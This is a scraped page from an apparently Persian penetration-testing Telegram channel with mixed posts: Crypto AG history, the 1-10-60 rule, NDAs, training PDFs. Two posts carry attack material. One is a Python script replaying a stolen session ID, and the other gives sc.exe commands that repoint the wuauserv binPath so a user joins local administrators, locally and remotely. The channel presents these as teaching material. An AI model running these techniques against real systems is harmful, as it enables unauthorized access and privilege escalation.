Try Hack Box – Telegram
Try Hack Box
5.76K subscribers
680 photos
65 videos
123 files
689 links
1 Nov 2020
1399/08/11
Learn penetration testing & Red Team
https://youtube.com/@tryhackbox
Channels :
@TryHackBoxOfficial ( RoadMap )
@TryHackBoxStory ( Story Hacking )
Contact : @ThbxSupport
Download Telegram
یک نمای کلی از نحوه انجام یک حمله Revival Hijack با استفاده از پایتون :

با این حال، لطفا توجه داشته باشید که این فقط برای اهداف آموزشی است و نباید برای فعالیت های مخرب استفاده شود.

⚠️ سلب مسئولیت: باید تاکید کنم که حملات Revival Hijack فعالیت های مخرب تلقی می شوند و نباید بدون اجازه و مجوز مناسب از صاحبان برنامه انجام شوند.

کد پایتون:

در اینجا مثالی از نحوه انجام یک حمله Revival Hijack با استفاده از پایتون با کتابخانه requests آورده شده است:
import requests

# Define the target application's URL and session ID
url = "https://example.com/login"
session_id = " WeakSessionID123"

# Define the headers and cookies for the request
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
"Accept-Language": "en-US,en;q=0.8",
"Accept-Encoding": "gzip, deflate, br"
}
cookies = {
"session_id": session_id
}

# Send a request to the application with the stolen session ID
response = requests.get(url, headers=headers, cookies=cookies)

# Check if the response indicates a successful session hijack
if response.status_code == 200:
print("Session hijack successful!")
# You can now perform actions on the application as the hijacked user
else:
print("Session hijack failed.")

توجه :

* این کد فقط برای اهداف آموزشی است و نباید برای فعالیت های مخرب استفاده شود.
* متغیر session_id باید با یک شناسه جلسه معتبر که از برنامه تارگت گرفته شده است جایگزین شود.
* متغیرهای headers و cookies باید برای مطابقت با نیازهای برنامه مورد نظر اصلاح شوند.
* این کد فرض می‌کند که برنامه تارگت از مکانیزم تولید شناسه جلسه ضعیف استفاده می‌کند و پس از خروج کاربر، جلسات را به درستی باطل نمی‌کند.

⚠️ باز هم باید تاکید کنم که حملات Revival Hijack فعالیت‌های مخرب تلقی می‌شوند و نباید بدون اجازه و مجوز مناسب از صاحبان برنامه انجام شوند.

مسئولیت استفاده غیر مجاز به عهده خود شخص می باشد ، ما هیچ مسئولیتی را بر عهده نمیگیریم

@TryHackBox
👍3
https://www.dorkgpt.com/

DorkGPT: Google Dorks
را با هوش مصنوعی ایجاد کنید

@TryHackBox
👍5
قانون ۶۰-۱۰-۱ چیست ؟ یعنی سازمان‌ها باید بتوانند زیر یک دقیقه نفوذ را شناسایی کنند، ریسک‌های آن را تا ۱۰ دقیقه ارزیابی نمایند و تا کمتر از یک ساعت مهاجم را بیرون کنند.

@TryHackBox
👍6
قانون ۶۰-۱۰-۱ شامل تشخیص نفوذ طی ۱ دقیقه، بررسی و انجام تحقیقات طی ۱۰ دقیقه، و قرنطینه و رفع مساله طی ۶۰ دقیقه است. هر چه یک نفوذگر فرصت بیشتری برای انجام حرکت جانبی در زمان حضور در سیستم در اختیار داشته باشد احتمال ایکه حمله موفقیت‌آمیز باشد، افزایش می‌یابد.
@TryHackBox
🔥3
Forwarded from TryHackBox Story
📌رمزگشایی تاریک بخش دوم: چگونه ایالات متحده از طریق بکدور پنهانی، ارتباطات جهانی را تحت کنترل گرفت

طبق گزارش‌هایی که در حال حاضر از حالت طبقه‌بندی خارج شده است، فریدمن در سال‌های 1955 تا 1969 بارها با هاگلین دیدار کرده است. در این گزارش، جزئیات مکالمات این دو مرد شرح داده شده است. در این گزارش‌ها آمده است که هاگلین علاوه بر اینکه قصد داشت تولید Crypto AG را افزایش دهد، همچنین می‌خواست مدل دوم این دستگاه را عرضه کند. هاگلین به فریدمن مواردی همچون پیشرفته‌تر بودن مدل دوم Crypto AG نسبت به مدل اول را گفت و همچنین اظهار داشت که مدل دوم دارای تکنولوژی پیشرفته‌تری است. در نهایت، قرار بر این شد که هاگلین مدل جدید را قبل از عرضه به بازار جهت بررسی به دولت ایالات متحده دهد. شایان ذکر است داشتن این دستگاه به تنهایی به ایالات متحده یک برتری تکنولوژیکی می‌داد، زیرا این فناوری در آن زمان بسیار پیشرفته بود.

همکاری و تبادل اطلاعات میان هاگلین و فریدمن فراتر از ارائه یک دستگاه جدید رمزنگاری بود. آن‌ها درباره مشتریان بالقوه Crypto AG از جمله سازمان‌های دولتی ایتالیا، مصر، اردن، عراق و عربستان بحث می‌کردند. شایان ذکر است در آن زمان بیش از 30 کشور متقاضی خرید محصولات این شرکت بودند که هاگلین جزئیات تعاملات خود را با آن کشورها در اختیار فریدمن قرار می‌داد.

علاوه بر اینکه هاگلین نسخه‌هایی از مکاتبات حساس با مشتریان بالقوه را به دولت ارائه می‌داد، بلکه استفاده مورد نظر مشتریان و نگرانی‌های مطرح شده از سوی آن‌ها را نیز به آمریکا ارائه می‌داد. به‌عنوان مثال، هاگلین جزئیات تعاملات خود را که شامل برنامه‌هایی برای بهبود در امور رمزنگاری با مقامات دولتی مرتبط با Patrick Ollier بود، به دولت آمریکا ارائه داد. یکی دیگر از برنامه‌هایی که هاگلین با مقامات دولتی فرانسه داشت، تأسیس یک کارخانه در پاریس همراه با تجهیزات و ابزارهای لازم برای توسعه سخت‌افزار دستگاه‌های مخفی بود. شایان ذکر است که رمزنگاری و اجزای درونی ماشین همگی از شرکت Crypto AG تأمین می‌شدند و فرانسه از طراحی‌ها، تجهیزات و کارشناسان این شرکت سوئیسی بهره می‌برد. شایان ذکر است که فرانسه و سایر کشورها نمی‌دانستند که هاگلین این جزئیات را با آمریکایی‌ها به اشتراک گذاشته است.

طبق اسنادی که از طبقه‌بندی خارج شده، در یکی از جلساتی که بین فریدمن و هاگلین برگزار شده بود، فریدمن پیشنهاد مهمی به هاگلین داد که متأسفانه ایالات متحده این بخش از گزارش را محرمانه کرده است. با این حال، یک‌سری بخش‌ها درون اسناد نوشته شده بود که Crypto AG از این پس نسخه‌هایی از تمامی مکاتبات مشتریان و سفارش‌های آنان را به ایالات متحده ارائه خواهد کرد.

واشنگتن پست در سال 2020 بر اساس تحقیقات خود و اطلاعات موجود در گزارش‌هایی که از طبقه‌بندی خارج شده‌اند، مقاله‌ای منتشر کرد که در آن توضیح می‌داد پیشنهاد فریدمن به هاگلین چه بوده که به شرح ذیل است:
هاگلین، بنیان‌گذار و مالک Crypto AG، و ویلیام فریدمن، پدر رمزنگاری آمریکا، در اوایل دهه 1950 سیستمی راه‌اندازی کردند که به NSA این امکان را می‌داد تا شرکت Crypto AG تصمیم بگیرد که دستگاه‌های ارتباطی قابل شکستن یا ناامن را به کجا بفروشد و دستگاه‌های ارتباطی غیرقابل شکستن یا امن را به کجا.

با توجه به این فکت‌ها، می‌توان گفت این اولین حمله زنجیره تأمین یا supply chain attack خواهد بود که در آن یک دولت به دسترسی پنهان مشابه یک بکدور دست یافته بود که به آن دولت این امکان را می‌داد که مکاتبات دولت‌های خارجی را نظارت کند.

✍️ نویسنده میلاد کهساری الهادی و محمد مهدی انبارکی
#ایالات_متحده #رمزگشایی_تاریک
@TryHackBoxStory
👍2
💡طراحی سیستم💡برگ تقلب برای طراحی سیستم های امن

@TryHackBox
👍2
دوستان فصل جدیدی از کانال ما شروع خواهد شد .

موضوع کانال : یاددادن تست نفوذ وب و شبکه درحال حاضر خواهد بود !

آموزش های ما :

آموزش تست نفوذ وب و شبکه و SOC را خواهیم داشت .

آموزش مقدماتی تست نفوذ رایگان .

و آموزش هایی از سایت TryHackMe و HackTheBox .

آموزش مهندسی اجتماعی و Osint را هم خواهیم داشت .

آموزش و مقالات مرتبط با Red Team .

آموزش زبان های برنامه نویسی برای تست نفوذ .



پست های قبل رو میخواستم پاک کنم ولی گفتم ممکنه لازم باشه و نگه میدارمشون که استفاده کنید حال موضوع ما مشخص شده است و طبق همین جلو میریم .

ما رو به دوستانتون معرفی کنید .

@TryHackBox
👍11🔥5
Try Hack Box pinned Deleted message
NDA چیست ؟
قرارداد عدم افشا (NDA) یا Non-Disclosure Agreement، یک توافق‌نامه قانونی است که بین دو یا چند طرف منعقد می‌شود تا اطلاعات محرمانه و حساس که در خلال تعاملات تجاری یا همکاری‌ها به اشتراک گذاشته می‌شود، محفوظ بماند. این قرارداد به طرفین این امکان را می‌دهد که بدون نگرانی از افشای اطلاعات حساس، همکاری کنند.

ویژگی‌های اصلی NDA:
1. تعریف اطلاعات محرمانه: NDA مشخص می‌کند که کدام اطلاعات به عنوان محرمانه تلقی می‌شود.
2. تعهد عدم افشا: طرفین متعهد می‌شوند که اطلاعات محرمانه را به شخص ثالث افشا نکنند.
3. مدت زمان اعتبار: NDA معمولاً مدت زمانی را برای اعتبار خود تعیین می‌کند که در آن اطلاعات باید محرمانه باقی بماند.
4. استثنائات: ممکن است شرایطی وجود داشته باشد که در آن افشای اطلاعات مجاز است، مانند موارد قانونی یا اطلاعاتی که قبلاً عمومی شده‌اند.
5. پیامدهای نقض: در صورت نقض قرارداد، عواقب قانونی و مالی برای طرف متخلف مشخص می‌شود.

NDAها معمولاً در زمینه‌های تجاری، فناوری، تحقیق و توسعه و سایر حوزه‌هایی که اطلاعات حساس وجود دارد، استفاده می‌شوند.

دو نکته حساس و کلیدی باید در کلیه قراردادهای NDA درج شود:

تعریف اطلاعات محرمانه

باید به دقت تعریف شود که اطلاعات محرمانه چیست و چه اطلاعاتی نباید افشا شود. در صورتی که تعریف دقیقی از اطلاعات محرمانه در قرارداد ارائه نشود، پیمان عدم افشا عملکرد ضعیفی خواهد داشت.

مشخص کردن طرفین قرارداد:
علاوه بر ارائه تعریف دقیق از اطلاعات محرمانه باید طرفین قرارداد و کلیه اشخاص و ذینفعان تعریف و مشخص شوند. برای مثال باید مشخص شود که اگر یکی از طرفین یک شخص حقوقی است آیا مسولیتی متوجه اعضا و افراد آن شرکت یا سازمان نیز هست یا خیر.
ایا سخنی برای اضافه کردند دارید ؟
#NDA
#قرارداد
@TryHackBox
👍9
مسابقه ای که شاپرک برگزار کرد واقعا کلی ایراد داشت و راحت میشد فلگ ها را با سرچ زدن پیدا کرد واقعا از لحاظ فنی صفر هستند .

یک مشت کپی پیست کار اسم خودشون گذاشتند امنیت کار !
👍20
این کد چه مشکلی دارد؟
#کوییز
2
Printer Hacking 101.pdf
1.7 MB
Printer Hacking 101

با هک چاپگر آشنا شوید و با آن آشنا شوید و اصول اولیه IPP را بدانید.
#PrinterHacking
@TryHackBox
👍8👎1
Hacking with PowerShell @TryHackBox.pdf
1 MB
Hacking with PowerShell

اصول اولیه PowerShell و PowerShell Scripting را بیاموزید.
#powershell
@TryHackBox
5
پیکربندی ناامن ACL های سرویس از طریق group policies

سیاست های گروه ابزار محبوبی برای مدیریت متمرکز زیرساخت های مبتنی بر Active Directory هستند. ابزار Group3r به شما امکان می دهد اطلاعاتی را از سیاست های گروه برای تجزیه و تحلیل بعدی جمع آوری کنید. Group3r همچنین برخی از تنظیمات نادرست را برجسته می کند، بنابراین جستجو با استفاده از کلمات کلیدی red و black برای شناسایی مهم ترین نقص ها راحت است. پست امروز درباره پیکربندی ناامن ACL های سرویس از طریق گروپ پالیسی است.

پس از راه اندازی Group3r و بررسی نتایج، خطوط زیر را یافتیم:
A Windows service's ACL is being configured to grant abusable permissions to a target trustee. This should allow local privilege escalation on affected hosts. Service: wuauserv, Trustee: Authenticated Users - S-1-5-11 .

اگر به خود Group Policy بروید، نام سرویس، نوع راه اندازی و تنظیمات حقوق دسترسی را در قالب یک رشته SSDL پیدا می کنیم:
"wuauserv",4,"D:AR(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCDCLCSWRPWPDTLOCRRC;;;AU)(A;;CCLCSWLOCRRC;;;IU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"

ما فقط به گروه AU علاقه مندیم:

- CC -
حقوق درخواست پیکربندی سرویس.
- DC -
حقوق تغییر سرویس.
- LC -
حقوق درخواست وضعیت سرویس ها؛
- SW -
حقوق فهرست کردن تمام خدمات وابسته به سرویس
- RP - حقوق شروع سرویس؛
- WP - حقوق توقف سرویس؛
- DT - حقوق توقف سرویس.
- LO – حقوقی که به شما امکان می دهد از سرویس بخواهید فورا وضعیت شما را گزارش کند.
- CR - حقوق تعیین کد کاربر عنصر کنترل.
- RC - حقوق خواندن توصیفگرهای امنیتی.

ابتدا باید تعیین کنید که این خط مشی گروه روی کدام کامپیوترها اعمال می شود.

MATCH(g:GPO {name:"VULNSERVICE@DOMAIN.LOCAL"})-[:GPLink|Contains*1..]->(c:Computer) RETURN c.name


اگر میزبان فعلی ما یا میزبانی که به آن دسترسی راه دور داریم این خط مشی را اعمال می کند، پیکربندی سرویس فعلی را در رایانه محلی پرس و جو می کنیم:
sc.exe qc wuauserv

ما مقدار فعلی پارامتر BINARY_PATH_NAME را برای بازیابی بعدی ذخیره می کنیم.
ما پارامتر BINARY_PATH_NAME را به کاری که می‌خواهیم در رایانه انجام دهیم تغییر می‌دهیم، برای مثال، خود را به گروه مدیران لوکال یا local administrators اضافه می‌کنیم.

sc.exe config wuauserv binPath= "net.exe localgroup administrators victim /add"

سرویس را شروع کنید:
sc.exe start wuauserv

اگر سرویس راه اندازی شده است، ابتدا باید آن را متوقف کنید و سپس آن را شروع کنید:
sc.exe stop wuauserv
sc.exe start wuauserv


در حالی که Group3r گزارش می دهد که این نقص می تواند برای افزایش دسترسی لوکال استفاده شود، در برخی موارد می توان از آن برای افزایش دسترسی از راه دور و lateral movement نیز استفاده کرد.

ما یک بررسی ساده انجام می دهیم، مانند راه اندازی یا نصب یک سرویس در یک میزبان راه دور:
sc.exe \\server start wuauserv

اگر خطای Access Denied ظاهر نشد، بیایید سعی کنیم خود را به گروه مدیران لوکال اضافه کنیم و سرویس را راه اندازی کنیم:
sc.exe \\server config wuauserv binPath= "net.exe localgroup administrators victim /add"
sc.exe \\server start wuauserv

پس از به دست آوردن دسترسی  local administrator، پارامتر BINARY_PATH_NAME را به حالت اولیه خود برگردانید.

#RedTeam #PurpleTeam #LPE
@TryHackBox
👍5🔥3
Media is too big
VIEW IN TELEGRAM
Pro's vs. Joes @Home Edition Presents: "Building A Monster Lab" w/ Jeff McJunkin

چگونه یک لابراتور برای خودمون بسازیم
#Lab
@TryHackBox
👍8
This media is not supported in your browser
VIEW IN TELEGRAM
💡آنتی ویروس چگونه کار می کند؟
#Av
@TryHackBox
👍9🎉1
دوستان به زودی فعالیتمون در یوتیوب شروع میشه خوشحال میشم حمایتمون کنید به زودی ...
فعالیتمون در یوتیوب مباحث تست نفوذ شبکه هست
👌19👍3
هنری که با خرد همراه نباشد، همچو مرگی که است که بر تن چیره گشته…
«برگرفته از اندرزنامه پهلویِ دستور آذرباد ماراسپندان»
@TryHackBox
9